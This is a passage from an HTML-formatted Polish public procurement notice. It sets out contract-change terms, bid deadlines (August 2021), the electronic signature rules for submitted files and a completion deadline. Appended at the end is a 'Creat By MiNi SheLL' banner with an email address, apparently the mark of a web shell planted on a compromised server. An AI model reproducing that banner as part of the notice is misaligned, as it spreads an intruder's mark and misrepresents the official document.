ust. 1 pkt 1 ustawy Prawo zamówień publicznych ZAMAWIAJĄCY dopuszcza następujące zmiany postanowień umowy oraz określa warunki zmian:<br/>1.	zmiana osób, o których mowa w §11 umowy;<br/>2.	zmiana numeru rachunku bankowego WYKONAWCY. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-26 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-26 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Uzupełnienie do Sekcji III, pkt 3.6) Ogłoszenia: •Jeżeli w wyniku podpisywania pliku<br/>kwalifikowanym podpisem elektronicznym zostanie utworzony dodatkowy plik z podpisem,<br/>Wykonawca jest zobowiązany przekazać Zamawiającemu oba pliki (plik podpisywany i plik z<br/>podpisem).•Jeżeli w wyniku podpisywania pliku podpisem osobistym lub profilem zaufanym<br/>zostanie utworzony dodatkowy plik z podpisem, Wykonawca jest zobowiązany przekazać<br/>Zamawiającemu oba pliki (plik podpisywany i plik z podpisem).<br/>2. Zamawiający wymaga aby przedmiot zamówienia został zrealizowany w terminie 10 tygodni (70 dni kalendarzowych) od daty zawarcia umowy, lecz nie dłużej niż do dnia 9 grudnia 2021 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com